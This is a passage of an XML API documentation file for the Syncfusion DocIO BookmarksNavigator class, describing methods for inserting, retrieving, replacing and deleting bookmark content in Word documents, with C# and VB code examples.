            <param name="text">The <b>string</b> that represents the text to be inserted.</param>
            <param name="saveFormatting"><b>True </b>if it is save formatting, otherwise <b>false</b>.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWTextRange"/> object that represents the inserted text.</returns>
            <example>This example shows how to insert a simple text along with its formatting using BookmarkNavigator.
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind");
                //Insert a new text before the bookmark end of the bookmark
                bookmarkNavigator.InsertText(" Northwind Database is a set of tables containing data fitted into predefined categories.", true);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind")
                'Insert a new text before the bookmark end of the bookmark
                bookmarkNavigator.InsertText(" Northwind Database is a set of tables containing data fitted into predefined categories.", True)
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.InsertTable(Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Inserts the specified <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> to current bookmark.
            </summary>
            <param name="table">The <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> to be inserted.</param>
            <example>
            <para>The following code example demonstrates how to insert a table using BookmarkNavigator.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move to the virtual cursor before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind", false, false);
                //Insert a new paragraph before the bookmark end
                IWParagraph paragraph = new WParagraph(document);
                paragraph.AppendText("Northwind Database Contains the following tables:");
                bookmarkNavigator.InsertParagraph(paragraph);
                //Insert a new table before the bookmark end
                WTable table = new WTable(document);
                table.ResetCells(3, 2);
                table[0, 0].AddParagraph().AppendText("Suppliers");
                table[0, 1].AddParagraph().AppendText("2");
                table[1, 0].AddParagraph().AppendText("Customers");
                table[1, 1].AddParagraph().AppendText("1");
                table[2, 0].AddParagraph().AppendText("Employees");
                table[2, 1].AddParagraph().AppendText("3");
                bookmarkNavigator.InsertTable(table);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move to the virtual cursor before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind", False, False)
                'Insert a new paragraph before the bookmark end
                Dim paragraph As IWParagraph = New WParagraph(document)
                paragraph.AppendText("Northwind Database Contains the following tables:")
                bookmarkNavigator.InsertParagraph(paragraph)
                'Insert a new table before the bookmark end
                Dim table As New WTable(document)
                table.ResetCells(3, 2)
                table(0, 0).AddParagraph().AppendText("Suppliers")
                table(0, 1).AddParagraph().AppendText("2")
                table(1, 0).AddParagraph().AppendText("Customers")
                table(1, 1).AddParagraph().AppendText("1")
                table(2, 0).AddParagraph().AppendText("Employees")
                table(2, 1).AddParagraph().AppendText("3")
                bookmarkNavigator.InsertTable(table)
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.InsertParagraphItem(Syncfusion.DocIO.DLS.ParagraphItemType)">
            <summary>
            Inserts the specified <see cref="T:Syncfusion.DocIO.DLS.IParagraphItem"/> to current bookmark.
            </summary>
            <param name="itemType">The type of the paragraph item to be inserted.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IParagraphItem"/> object that represents the inserted item.</returns>
            <example>
            <para>The following code example demonstrates how to insert a paragraph item using BookmarkNavigator.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move to the virtual cursor after the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind", false, true);
                //Insert a new picture after the bookmark end
                WPicture picture = bookmarkNavigator.InsertParagraphItem(ParagraphItemType.Picture) as WPicture;
                picture.LoadImage(Image.FromFile("Northwind.png"));
                picture.WidthScale = 50;
                picture.HeightScale = 50;
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move to the virtual cursor after the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind", False, True)
                'Insert a new picture after the bookmark end
                Dim picture As WPicture = TryCast(bookmarkNavigator.InsertParagraphItem(ParagraphItemType.Picture), WPicture)
                picture.LoadImage(Image.FromFile("Northwind.png"))
                picture.WidthScale = 50
                picture.HeightScale = 50
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.InsertParagraph(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Inserts the specified <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> to current bookmark.
            </summary>
            <param name="paragraph">The <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> to be inserted.</param>
            <example>
            <para>The following code example demonstrates how to insert a paragraph using BookmarkNavigator.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move to the virtual cursor after the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind", false, true);
                //Insert a new paragraph before the bookmark start
                IWParagraph paragraph = new WParagraph(document);
                paragraph.AppendText("Northwind Database is a set of tables containing data fitted into predefined categories.");
                bookmarkNavigator.InsertParagraph(paragraph);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move to the virtual cursor after the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind", False, True)
                'Insert a new paragraph before the bookmark start
                Dim paragraph As IWParagraph = New WParagraph(document)
                paragraph.AppendText("Northwind Database is a set of tables containing data fitted into predefined categories.")
                bookmarkNavigator.InsertParagraph(paragraph)
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.InsertTextBodyPart(Syncfusion.DocIO.DLS.TextBodyPart)">
            <summary>
            Inserts the specified <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/> to current bookmark.
            </summary>
            <param name="bodyPart">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/> to be inserted.</param>
            <example>
            <para>The following code example demonstrates how to insert a text body part using BookmarkNavigator.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move to the virtual cursor before the bookmark end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind");
                //Get the bookmark content
                TextBodyPart textBodyPart = bookmarkNavigator.GetBookmarkContent();
                document.AddSection();
                IWParagraph paragraph = document.LastSection.AddParagraph();
                paragraph.AppendText("Northwind Database is a set of tables containing data fitted into predefined categories.");
                //Add the new bookmark into Word document
                paragraph.AppendBookmarkStart("bm_empty");
                paragraph.AppendBookmarkEnd("bm_empty");
                //Move to the virtual cursor after the start location of the bookmark "bm_empty"
                bookmarkNavigator.MoveToBookmark("bm_empty", true, true);
                //Insert the text body part after the bookmark start
                bookmarkNavigator.InsertTextBodyPart(textBodyPart);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move to the virtual cursor before the bookmark end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind")
                'Get the bookmark content
                 Dim textBodyPart As TextBodyPart = bookmarkNavigator.GetBookmarkContent()
                document.AddSection()
                Dim paragraph As IWParagraph = document.LastSection.AddParagraph()
                paragraph.AppendText("Northwind Database is a set of tables containing data fitted into predefined categories.")
                'Add the new bookmark into Word document
                paragraph.AppendBookmarkStart("bm_empty")
                 paragraph.AppendBookmarkEnd("bm_empty")
                'Move to the virtual cursor after the start location of the bookmark "bm_empty"
                bookmarkNavigator.MoveToBookmark("bm_empty", True, True)
                'Insert the text body part after the bookmark start
                bookmarkNavigator.InsertTextBodyPart(textBodyPart)
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.GetBookmarkContent">
            <summary>
            Returns the bookmark content as a <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>, which represents
            the collection of body items if the bookmark start and bookmark end are preserved in a single section.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/> that represents the bookmark content.</returns>
            <example> This example shows how to retrieve the specified bookmark content using GetBookmarkContent method in a Word document.
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind");
                //Get the bookmark content
                TextBodyPart part = bookmarkNavigator.GetBookmarkContent();
                //Add the retrieved content into another new section
                document.AddSection();
                foreach(TextBodyItem item in part.BodyItems)
                    document.LastSection.Body.ChildEntities.Add(item);
                document.Save("Result.docx", FormatType.Docx);
                    document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind")
                'Get the bookmark content
                Dim part As TextBodyPart = bookmarkNavigator.GetBookmarkContent()
                'Add the retrieved content into another new section
                document.AddSection()
                For Each item As TextBodyItem In part.BodyItems
                    document.LastSection.Body.ChildEntities.Add(item)
                Next
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.GetContent">
            <summary>
            Gets the bookmark content as <see cref="T:Syncfusion.DocIO.DLS.WordDocumentPart"/>, which represents the collection of sections 
            if the bookmark start and bookmark end are preserved in different sections .
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WordDocumentPart"/> that represents the bookmark content.</returns>
            <example>This example shows how to retrieve the specified bookmark content using GetContent method in a Word document.
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document with bookmark "Northwind" whose start and end preserved in different section
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind");
                //Get the bookmark content as WordDocumentPart
                WordDocumentPart wordDocumentPart = bookmarkNavigator.GetContent();
                //Save the WordDocumentPart as separate Word document
                WordDocument newDocument = wordDocumentPart.GetAsWordDocument();
                newDocument.Save("Result.docx", FormatType.Docx);
                //Release the resources hold by WordDocument instance
                newDocument.Close();
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document with bookmark "Northwind" whose start and end preserved in different section
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind")
                'Get the bookmark content as WordDocumentPart
                Dim wordDocumentPart As WordDocumentPart = bookmarkNavigator.GetContent()
                'Save the WordDocumentPart as separate Word document
                Dim newDocument As WordDocument = wordDocumentPart.GetAsWordDocument()
                newDocument.Save("Result.docx", FormatType.Docx)
                'Release the resources hold by WordDocument instance
                newDocument.Close()
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteBookmarkContent(System.Boolean)">
            <summary>
            Deletes the bookmark content.
            </summary>
            <param name="saveFormatting"><b>True </b>if its save formatting, otherwise <b>false</b>.</param>
            <example>This example shows how to remove the contents of a bookmark from Word document.
            <code lang = "C#"> 
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move the virtual cursor to the before the end location of the bookmark " Northwind "
                bookmarkNavigator.MoveToBookmark("Northwind");
                //Delete bookmark content without deleting the format in the target document.
                bookmarkNavigator.DeleteBookmarkContent(false);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move the virtual cursor to the before the end location of the bookmark " Northwind "
                bookmarkNavigator.MoveToBookmark("Northwind")
                'Delete bookmark content without deleting the format in the target document.
                bookmarkNavigator.DeleteBookmarkContent(False)
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteBookmarkContent(System.Boolean,System.Boolean)">
            <summary>
            Deletes the bookmark content and removes the empty paragraph after deletion.
            </summary>
            <param name="saveFormatting"><b>True </b>if to save formatting; otherwise, <b>false</b>.</param>
            <param name="removeEmptyParagraph"><b>True </b>if to remove paragraph with 
            bookmark start and end when it is empty after deletion; otherwise, <b>false</b>.</param>
            <remarks>This method will be removed in future version. As a work around to remove bookmarked paragraph, utilize current bookmark property of bookmark navigator to access the current bookmarked paragraph and then remove its index from its owner (Text Body) collection.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.ReplaceBookmarkContent(Syncfusion.DocIO.DLS.TextBodyPart)">
            <summary>
            Replaces the bookmark content with the specified <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>.
            </summary>
            <param name="bodyPart">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/> to replace the bookmark contents.</param>
            <remarks><para>You cannot replace the multi section contents into a bookmark within table in Word documents.</para>
            <para>Use for loop instead of foreach loop for iterating through document elements when replacing the bookmark contents to avoid �collection modified exception�. Since there is chance for modification in document elements while replacing the bookmark contents.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to replace a specified bookmark content in the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move to the virtual cursor before the bookmark end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind");
                //Get the bookmark content
                TextBodyPart textBodyPart = bookmarkNavigator.GetBookmarkContent();
                document.AddSection();
                IWParagraph paragraph = document.LastSection.AddParagraph();
                paragraph.AppendText("Northwind Database is a set of tables containing data fitted into predefined categories.");
                //Add the new bookmark into Word document
                paragraph.AppendBookmarkStart("bm_empty");
                .AppendBookmarkEnd("bm_empty");
                //Move to the virtual cursor before the end location of the bookmark "bm_empty"
                bookmarkNavigator.MoveToBookmark("bm_empty");
                //Replace the bookmark content with text body part
                bookmarkNavigator.ReplaceBookmarkContent(textBodyPart);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move to the virtual cursor before the bookmark end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind")
                'Get the bookmark content
                Dim textBodyPart As TextBodyPart = bookmarkNavigator.GetBookmarkContent()
                document.AddSection()
                Dim paragraph As IWParagraph = document.LastSection.AddParagraph()
                paragraph.AppendText("Northwind Database is a set of tables containing data fitted into predefined categories.")
                'Add the new bookmark into Word document
                paragraph.AppendBookmarkStart("bm_empty")
                paragraph.AppendBookmarkEnd("bm_empty")
                'Move to the virtual cursor before the end location of the bookmark "bm_empty"
                bookmarkNavigator.MoveToBookmark("bm_empty")
                'Replace the bookmark content with text body part
                bookmarkNavigator.ReplaceBookmarkContent(textBodyPart)
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.ReplaceContent(Syncfusion.DocIO.DLS.WordDocumentPart)">
            <summary>
            Replaces the content of the bookmark with the specified <see cref="T:Syncfusion.DocIO.DLS.WordDocumentPart"/>.
            </summary>
            <param name="documentPart">The <see cref="T:Syncfusion.DocIO.DLS.WordDocumentPart"/> to replace the bookmark contents.</param>
            <remarks><para>You cannot replace the multi section contents into a bookmark within table in Word documents.</para>
            <para>Use for loop instead of foreach loop for iterating through document elements when replacing the bookmark contents to avoid �collection modified exception�. Since there is chance for modification in document elements while replacing the bookmark contents.</para>
            </remarks>
            <example>This example shows how to replace a specified bookmark content using ReplaceContent method in Word document.
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document with bookmark "Northwind" whose start and end preserved in different section
                WordDocument templateDocument = new WordDocument("Template.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(templateDocument);
                //Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind");
                //Get the bookmark content as WordDocumentPart
                WordDocumentPart wordDocumentPart = bookmarkNavigator.GetContent();
                //Close the template document
                templateDocument.Close();
                //Load the Word document with bookmark NorthwindDB
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                bookmarkNavigator = new BookmarksNavigator(document);
                //Move the virtual cursor to the before the end location of the bookmark "NorthwindDB"
                bookmarkNavigator.MoveToBookmark("NorthwindDB");
                //Replace the bookmark content with word body part
                bookmarkNavigator.ReplaceContent(wordDocumentPart);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document with bookmark "Northwind" whose start and end preserved in different section
                Dim templateDocument As New WordDocument("Template.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(templateDocument)
                'Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind")
                'Get the bookmark content as WordDocumentPart
                Dim wordDocumentPart As WordDocumentPart = bookmarkNavigator.GetContent()
                'Close the template document
                templateDocument.Close()
                'Load the Word document with bookmark NorthwindDB
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                bookmarkNavigator = New BookmarksNavigator(document)
                'Move the virtual cursor to the before the end location of the bookmark "NorthwindDB"
                bookmarkNavigator.MoveToBookmark("NorthwindDB")
                'Replace the bookmark content with word body part
                bookmarkNavigator.ReplaceContent(wordDocumentPart)
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.ReplaceBookmarkContent(System.String,System.Boolean)">
            <summary>
            Replaces the content of the bookmark with the specified text and formatting.
            </summary>
            <param name="text">The <b>string</b> that specifies the text.</param>
            <param name="saveFormatting"><b>True</b> if to save formatting, otherwise <b>false</b>.</param>
            <example>
            <para>The following code example demonstrates how to replace a specified bookmark content with simple text along with its formatting.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                document.AddSection();
                IWParagraph paragraph = document.LastSection.AddParagraph();
                //Add the new bookmark into Word document
                paragraph.AppendBookmarkStart("bm_empty");
                paragraph.AppendBookmarkEnd("bm_empty");
                //Move to the virtual cursor before the end location of the bookmark "bm_empty"
                bookmarkNavigator.MoveToBookmark("bm_empty");
                //Replace the bookmark content with text body part
                bookmarkNavigator.ReplaceBookmarkContent(" Northwind Database is a set of tables containing data fitted into predefined categories.", true);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                document.AddSection()
                Dim paragraph As IWParagraph = document.LastSection.AddParagraph()
                'Add the new bookmark into Word document
                paragraph.AppendBookmarkStart("bm_empty")
                paragraph.AppendBookmarkEnd("bm_empty")
                'Move to the virtual cursor before the end location of the bookmark "bm_empty"
                bookmarkNavigator.MoveToBookmark("bm_empty")
                'Replace the bookmark content with text body part
                bookmarkNavigator.ReplaceBookmarkContent(" Northwind Database is a set of tables containing data fitted into predefined categories.", True)
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.ReplaceBookmarkIndex(System.String,System.Int32)">
            <summary>
            Replace bookmark item particular index,which is before performing replace bookmark content
            </summary>
            <param name="bookmarkName">Current bookmark name</param>
            <param name="bkmkIndex">Bookmark index in Document.Bookmarks collection, which is before performing replace bookmark content</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.ReplaceParagraphBookmarkContent(Syncfusion.DocIO.DLS.WordDocumentPart)">
            <summary>
            Replace the word document part when bookmark item inside paragraph
            </summary>
            <param name="documentPart">The word document part</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteBookmarkContent(System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Deletes the bookmark content.
            </summary>
            <param name="saveFormatting">if it is save formatting, set to <c>true</c>.</param>
            <param name="removeEmptyParagrph">if remove the empty paragraph, set to <c>true</c>.</param>
            <param name="isReplaceBkmkContent">if replace bookmark content, set to <c>true</c>.</param>
            <exception cref="T:System.InvalidOperationException">thrown when the current bookmark is null</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteInBetweenSections(System.Int32,System.Int32)">
            <summary>
            Delete the in between section from bookmark start owner section to bookmark end owner section
            </summary>
            <param name="startSectiontionIndex">Bookmark start section index</param>
            <param name="endSectiontionIndex">Bookmark end section index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteBkmkContentInDiffCell(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd,Syncfusion.DocIO.DLS.WTableCell,System.Boolean)">
            <summary>
            Delete bookmark content inside different cell
            </summary>
            <param name="paragraphStart">Bookmark start owner paragraph</param>
            <param name="paragraphEnd">Bookmark end owner paragraph</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
            <param name="bkmkEndCell">Bookmark content comes table after paragraph,if it is table bookmark content pass endcell</param>
            <param name="isReplaceContent">set to <c>true</c> when performing replcae operation</param>
            <exception cref="T:System.InvalidOperationException">thrown when performing replacing operation, bookmark starts in one tabel and bookmark ends in another table partially</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteTableBookmarkTextBody(Syncfusion.DocIO.DLS.WTable,Syncfusion.DocIO.DLS.WTable,System.Int32,System.Int32,System.Boolean)">
            <summary>
            Delete the bookmark content inside two different table rows
            </summary>
            <param name="bkmkStartTable">Bookmark start owner table</param>
            <param name="bkmkEndTable">Bookmark end owner table</param>
            <param name="bkmkStartRowIndex">Bookmark start owner row index</param>
            <param name="bkmkEndRowIndex">Bookmark end owner row index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.CheckTwoTableProperties(Syncfusion.DocIO.DLS.WTable,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Checks tehe two different table position properties are same
            </summary>
            <param name="bkmkStartTable">Bookmark start owner table</param>
            <param name="bkmkEndTable">Bookmars end table owner table</param>
            <returns>
            <value><c>true</c>If the two table properties are same. else <c>false</c></value></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteBkmkContentInTableAfterParagraph(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd,System.Boolean)">
            <summary>
            Delete the bookmark content inside table after paragraph.
            </summary>
            <param name="paragraphStart">Bookmark start owner paragraph</param>
            <param name="paragraphEnd">Bookmark end owner paragraph</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteTableRows(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Delete the table rows inside bookmark start and bookmark end
            </summary>
            <param name="startRowIndex">Bookmark start owner row index</param>
            <param name="endRowIndex">Bookmark end owner row index</param>
            <param name="bkmkTable">BookmarkTable</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteBkmkContentInParagraphAftertable(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd,System.Boolean)">
            <summary>
            Delete bookmark content inside paragraph after table.
            </summary>
            <param name="paragraphStart">Bookmark start owner paragraph</param>
            <param name="paragraphEnd">Bookmark end owner paragraph</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
            <param name="isReplaceContent">Is replcae bookmark content, set to <c>true</c></param>
            <exception cref="T:System.InvalidOperationException">thrown when performing replace operation, bookmark starts before the table and bookmark ends in table partially </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.GetParagraphToInsertBookmark(Syncfusion.DocIO.DLS.WTextBody,Syncfusion.DocIO.DLS.WTextBody,Syncfusion.DocIO.DLS.WParagraph,System.Int32,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd,System.Boolean,System.Boolean)">
            <summary>
            Get the paragraph to insert the bookmark start and bookmark end
            </summary>
            <param name="startTextBody">Bookmark start owner textbody</param>
            <param name="endTextBody">Bookmark end owner textbody</param>
            <param name="paragraph">Bookmark owner paragraph</param>
            <param name="bkmkItemIndex">Bookmark owner paragraph index</param>
            <param name="bkmkStart">Bookmark start</param>
            <param name="bkmkEnd">Bookmark end</param>
            <param name="isInSingleSection">Set to <c>true</c>when the bookmark content inside same section</param>
            <param name="isParaAfterTable">Set to <c>true</c> when the bookmark content inside different section</param>
            <returns></returns>
        </member>
